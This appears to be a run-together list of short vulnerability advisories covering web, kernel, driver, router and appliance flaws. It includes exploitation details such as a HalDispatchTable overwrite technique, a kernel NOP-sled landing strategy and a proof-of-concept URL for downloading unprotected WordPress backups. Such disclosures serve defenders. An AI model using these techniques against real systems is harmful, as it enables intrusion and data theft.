Multiple persistent input validation web vulnerabilities and a filter bypass issue has been discovered in the Barracuda Networks WebFilter 610-Vx appliance web-application. The vulnerability allows remote attackers to bypass the security filter protection to inject malicious persistent script codes on the application-side (persistent). The persistent input validation web vulnerability is located in the `username` and `password` value of the `/cgi-mod/index.cgi` module. Remote attackers are able to inject own malicious persistent script codes to the vulnerable `username` and `password` value of the `/cgi-mod/index.cgi` module.
This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the following will trigger the #GP in sysret and overwrite the #PF handler so we can land to our NOP sled mapped at 0x80000000. However, once landed, the IDT will be trashed. We can either attempt to restore it (then escalate privileges and execute our shellcode) or find something else to overwrite that would transfer exec flow to our controlled user-space address. Since 3.10.something, IDT is read-only anyway.
A race condition exists between updating httpd's "scoreboard" and mod_status, leading to several critical scenarios like heap buffer overflow with user supplied payload and leaking heap which can leak critical memory containing htaccess credentials, ssl certificates private keys and so on.
Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. This device also allows any authenticated user to read arbitrary files. Files can be anywhere on the target.
A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.
Raritan PowerIQ suffers from an unauthenticated SQL injection vulnerability within an endpoint used during initial configuration of the licensing for the product. This endpoint is still available after the appliance has been fully configured. Both the 'sort' and 'dir' parameters are vulnerable. sqlmap identified the following injection points with a total of 1173 HTTP(s) requests.
A stack overflow vulnerability exists in World of Warcraft 3.3.5a, which allows an attacker to execute arbitrary code by creating a malicious macros-cache.txt file in the WTF/Account/[AccountName] directory. The attacker can then use this file to execute arbitrary code on the target system.
Ajin Abraham discovered multiple vulnerabilities in MTS MBlaze Ultra Wi-Fi / ZTE AC3633, including login bypass, router credential stealing, Wi-Fi password stealing, CSRF, and reset password without old password and session. An attacker can exploit these vulnerabilities to gain unauthorized access to the router.
wpbackupplus make the backup .zip files and not protected. For download all the website files, the attacker can use the URL http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/. For download the Database backup, the attacker can use the URL http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp. The POC is http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/[DATABASE_NAME]_[DATE].sql.
A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.
Services By CQR